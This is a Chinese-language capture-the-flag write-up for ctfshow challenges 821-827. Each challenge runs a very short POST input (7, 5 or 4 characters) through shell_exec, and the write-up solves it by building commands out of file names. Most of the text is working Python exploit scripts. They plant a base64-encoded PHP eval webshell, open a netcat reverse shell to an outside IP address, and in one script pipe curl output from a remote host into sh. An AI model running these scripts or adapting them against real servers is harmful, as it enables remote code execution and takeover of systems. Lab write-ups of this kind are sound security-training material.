对应ctfshow上821-827
7字符web目录可写
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
#flag in database;
error_reporting(0);
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
if(strlen($cmd) <= 7){
shell_exec($cmd);
}
?>>可以创建文件
\表示这一行没结束,下一行继续跟上
*可以执行命令,第一个文件为命令,后面的文件为参数
. 可以将文件当脚本执行
正常情况下,我们写一个1.php,内容为helloworld
echo 'helloworld'>1.php那么怎么在七个字符内写一个内容为helloworld的1.php呢
>hp
>1.p\\
>\>\\
>rld\\
>low\\
>hel\\
>o\ \\
>ech\\
ls -t>0
. 0
所以我们只需将内容替换为一句话,依次写入即可
# <?php eval($_GET[1]);
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php821
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://ed9441a5-6e27-43b0-8538-bdd2f5a5b4d2.challenge.ctf.show/"
payload=[
">hp",
">1.p\\",
">d\\>\\",
">\\ -\\",
">e64\\",
">bas\\",
">7\\|\\",
">XSk\\",
">Fsx\\",
">dFV\\",
">kX0\\",
">bCg\\",
">XZh\\",
">AgZ\\",
">waH\\",
">PD9\\",
">o\\ \\",
">ech\\",
"ls -t>0",
". 0"
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"1.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"1.php")
def main():
run()
check()
if __name__ == '__main__':
main()单独拎出来看一下效果
import os
payload=[
">hp",
">1.p\\",
">d\\>\\",
">\\ -\\",
">e64\\",
">bas\\",
">7\\|\\",
">XSk\\",
">Fsx\\",
">dFV\\",
">kX0\\",
">bCg\\",
">XZh\\",
">AgZ\\",
">waH\\",
">PD9\\",
">o\\ \\",
">ech\\"
]
for i in range(0,len(payload)):
os.system(payload[i])
os.system('sleep 1')
7字符web目录不可写
这里用另一种方法,更简单
因为没有web目录的写入权限,可以考虑写临时文件
PHP默认会向临时目录写文件,我们可以上传一个文件,这时PHP会在临时目录下生成这个文件,然后我们直接执行这个文件就行
822
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://538ae548-ca26-4dfc-af73-ded632f3b6be.challenge.ctf.show/"
def getShell(payload):
data={
"cmd":payload
}
file = {
"file":b"#!/bin/sh\nnc 47.100.137.45 2233 -e /bin/sh"
}
requests.post(url,data=data,files=file)
print("[*] Attack success!!!")
def run():
getShell(". /t*/*")
def main():
run()
if __name__ == '__main__':
main()5字符有dir命令
先将index.php重命名成.php
然后在临时目录写马
最后将临时目录下的文件打包到web目录执行
823
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://a07f1836-53b8-4c20-93a0-430ce8c80b0d.challenge.ctf.show/"
url_2 = url+".php"
delay = 1
chagneFile_payload=[
'>cp',
'>k',
'*',
'rm cp',
'>pc',
'>dir',
'*>v',
'>rev',
'*v>z', //相当于rev v>z
'sh z',
'rm v',
'rm k',
'rm z',
'rm pc',
'rm *v',
'>php.',
'>j\\#',
'>vm',
'*>v',
'>rev',
'*v>z',
'sh z'
]
clearFile_payload=[
'rm d*',
'rm j*',
'rm p*',
'rm r*',
'rm v*',
'rm z'
]
shell_payload=[
'>tar',
'>vcf',
'>z'
]
file={
'file':b'<?php file_put_contents("1.php","<?php eval(\\$_POST[1]);?>");?>'
}
def changeFile():
for p in chagneFile_payload:
sendPayload(url,p)
print("[*] create "+p.strip())
time.sleep(delay)
def clearFile():
for p in clearFile_payload:
sendPayload(url_2,p)
print("[*] create "+p.strip())
time.sleep(delay)
def getshell():
for p in shell_payload:
sendPayload(url_2,p)
print("[*] create "+p.strip())
time.sleep(delay)
data={
"cmd":"* /t*"
}
requests.post(url_2,data=data,files=file)
data={
"cmd":"php z"
}
requests.post(url_2,data=data)
def checkShell():
response = requests.get(url+"1.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"1.php")
def sendPayload(url,payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
changeFile()
clearFile()
getshell()
checkShell()
def main():
run()
if __name__ == '__main__':
main()5字符没有dir命令
利用grep命令
grep h index.php将匹配出的行写入到文件中,再想办法把内容追加到index.php中
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
#flag in database;
error_reporting(0);
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
if(strlen($cmd) <= 5){
shell_exec($cmd);
}
?>
824
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:28
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://ce2e69a5-b06c-4fee-ac56-054bd988dad5.challenge.ctf.show/"
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(0.5)
print("[*] Attack success!!!Webshell is "+url)
def main():
run()
if __name__ == '__main__':
main()4字符有dir命令
依旧是利用ls -t>0
但是只有4个字符
既然没有办法直接执行命令,那就构造出对应的文件名
825
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://eb893c73-86c3-449f-98fe-0f82d9212110.challenge.ctf.show/"
payload = [
'>sl',
'>kt-',
'>j\\>',
'>j\\#',
'>dir',
'*>v',
'>rev',
'*v>x',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh x',
'sh j'
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(0.3)
def check():
response = requests.get(url+"a.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"a.php")
def main():
run()
check()
if __name__ == '__main__':
main()最终x中的内容如下
ls -tk >j #j php.xednij的内容
j
ec\
ho\
$\
{\
IF\
S}\
PD\
9w\
aH\
Ag\
ZX\
Zh\
bC\
gk\
X0\
dF\
VF\
sx\
XS\
k7\
Pz\
4=\
|\
ba\
se\
64\
\
-d\
>\
a.\
php
x
rev
v
dir
j#
j>
kt-
sl
index.php4字符无dir命令
依旧利用ls -t
826
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://fb05f8d2-0afc-459d-89d1-766bf1dcf404.challenge.ctf.show/"
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
#curl 2030350346|sh
#echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php
'>sh',
'>\\|\\',
'>46\\',
'>03\\',
'>35\\',
'>30\\',
'>20\\',
'>\\ \\',
'>rl\\',
'>cu\\',
'sh z',
'sh a',
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"1.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"1.php")
def main():
run()
check()
if __name__ == '__main__':
main()4字符无dir命令不出网
同上
827
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://ab1290cc-c3f0-4ff2-b864-a4388d4331a6.challenge.ctf.show/"
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh z',
'sh a'
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"a.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"a.php")
def main():
run()
check()
if __name__ == '__main__':
main()